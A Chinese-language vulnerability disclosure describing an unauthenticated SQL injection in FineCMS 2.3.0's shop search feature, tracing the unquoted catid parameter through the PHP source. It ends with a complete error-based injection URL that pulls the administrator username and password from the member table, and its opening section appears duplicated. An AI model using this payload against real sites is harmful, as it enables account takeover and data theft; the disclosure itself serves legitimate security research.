### 简要描述: finecms最新版2.3.0(2014年4月18号更新)SQL注入 ### 详细说明: finecms最新版2.3.0,官方2014年4月18号更新。 某处存在SQL注入,无需登陆,可直接注入获取管理员账号。 文件:FineCMS v2.3.0/shop/controllers/search.php ``` /** * 搜索 */ public function index() { parent::_search(); } ``` 进入search,文件/FineCMS v2.3.0/dayrui/core/D_Module.php: ``` /** * 模块内容搜索页 */ protected function _search() { $this->load->model('search_model'); $mod = $this->get_cache ('module-'.SITE_ID.'-'.APP_DIR); // 清除过期缓存 $this->search_model->clear($mod ['setting']['search']['cache']); // 搜索参数 $get = $this->input->get(NULL, TRUE); $get = isset($get['rewrite']) ? dr_rewrite_decode($get['rewrite']) : $get; $id = $get['id']; $catid = (int)$get['catid']; $get['keyword'] = str_replace(array ('%', ' '), array('', '%'), $get['keyword']); unset($get['c'], $get['m'], $get ['id'], $get['page']); // 关键字个数判断 if ($get['keyword'] && strlen($get ['keyword']) < (int)$mod['setting']['search'] ['length']) { $this->msg(lang('mod-31')); } if ($id) { // 读缓存数据 $data = $this->search_model-...
### 简要描述: finecms最新版2.3.0(2014年4月18号更新)SQL注入 ### 详细说明: finecms最新版2.3.0,官方2014年4月18号更新。 某处存在SQL注入,无需登陆,可直接注入获取管理员账号。 文件:FineCMS v2.3.0/shop/controllers/search.php ``` /** * 搜索 */ public function index() { parent::_search(); } ``` 进入search,文件/FineCMS v2.3.0/dayrui/core/D_Module.php: ``` /** * 模块内容搜索页 */ protected function _search() { $this->load->model('search_model'); $mod = $this->get_cache ('module-'.SITE_ID.'-'.APP_DIR); // 清除过期缓存 $this->search_model->clear($mod ['setting']['search']['cache']); // 搜索参数 $get = $this->input->get(NULL, TRUE); $get = isset($get['rewrite']) ? dr_rewrite_decode($get['rewrite']) : $get; $id = $get['id']; $catid = (int)$get['catid']; $get['keyword'] = str_replace(array ('%', ' '), array('', '%'), $get['keyword']); unset($get['c'], $get['m'], $get ['id'], $get['page']); // 关键字个数判断 if ($get['keyword'] && strlen($get ['keyword']) < (int)$mod['setting']['search'] ['length']) { $this->msg(lang('mod-31')); } if ($id) { // 读缓存数据 $data = $this->search_model- >get($id); $catid = $data['catid']; $data['get'] = $data ['params']; if (!$data) { $this->msg(lang('mod-32')); } } else { // 组合搜索条件 $data = $this->search_model- >set($get); } list($parent, $related) = $this- >_related_cat($mod, $catid); $urlrule = $mod['setting']['search'] ['rewrite'] ? 'search-id-{id}-page-{page}.html' : 'index.php?c=search&id={id}&page={page}'; $this->template->assign (dr_category_seo($mod, $mod['category'][$catid], max (1, (int)$this->input->get('page')))); $this->template->assign(array( 'get' => $get, 'cat' => $mod['category'] [$catid], 'caitd' => $catid, 'parent' => $parent, 'related' => $related, 'keyword' => $get['keyword'], 'urlrule' => str_replace ('{id}', $data['id'], $urlrule), )); $this->template->assign($data); $this->template->display ('search.html'); } /** * 顶级可用栏目 */ public function show_select_category() { $data = array(); $category = $this->get_cache ('module-'.SITE_ID.'-'.APP_DIR, 'category'); foreach ($category as $t) { if (!$t['child'] && $t ['permission'][$this->member['mark']]['add']) { $pids = explode(',', $t['pids']); $pid = (int)$pids[1]; if (isset($category [$pid])) { $category [$pid]['mark'] = 1; $data[$pid] = $category[$pid]; } } } $this->template->assign(array( 'id' => 2, 'list' => $data )); $this->template->display ('category_select.html'); } ``` 在组合搜索条件时处理了get参数。 文件,/FineCMS v2.3.0/dayrui/models/Search_model.php: ``` public function set($get) { // 查询表名称 $table = $this->db->dbprefix (SITE_ID.'_'.APP_DIR); $table_more = $this->db->dbprefix (SITE_ID.'_'.APP_DIR.'_category_data'); ......... // 栏目的字段 if ($get['catid']) { $more = FALSE; $cat_field = $module ['category'][$get['catid']]['field']; $where[0] = '`'. $table.'`.`catid`'.($module['category'][$get ['catid']]['child'] ? 'IN ('.$module['category'][$get ['catid']]['childids'].')' : '='.$get['catid']); if ($cat_field) { foreach ($cat_field as $name => $field) { if (isset ($get[$name]) && $get[$name]) { $more = TRUE; $where[] = $this->_where($table_more, $name, $get [$name], $cat_field); } if (isset ($_order_by[$name])) { $more = TRUE; $order_by[] = '`'.$table.'`.`'.$name.'` '.$_order_by [$name]; } } } if ($more) $from.= ' LEFT JOIN `'.$table_more.'` ON `'.$table.'`.`id`=`'. $table_more.'`.`id`'; } ......... ``` 在处理栏目字段时: ``` $where[0] = '`'.$table.'`.`catid`'.($module ['category'][$get['catid']]['child'] ? 'IN ('.$module ['category'][$get['catid']]['childids'].')' : '='. $get['catid']); ``` 对参数carid没有加引号保护,导致SQL注入。 ### 漏洞证明: EXP: ``` http://localhost/shop/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000 ``` 如图,获取管理员帐号信息: [<img src="https://images.seebug.org/upload/201405/10155712b85ae0fb2cfd42e1481837fa12483583.jpg" alt="finecms1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/10155712b85ae0fb2cfd42e1481837fa12483583.jpg)
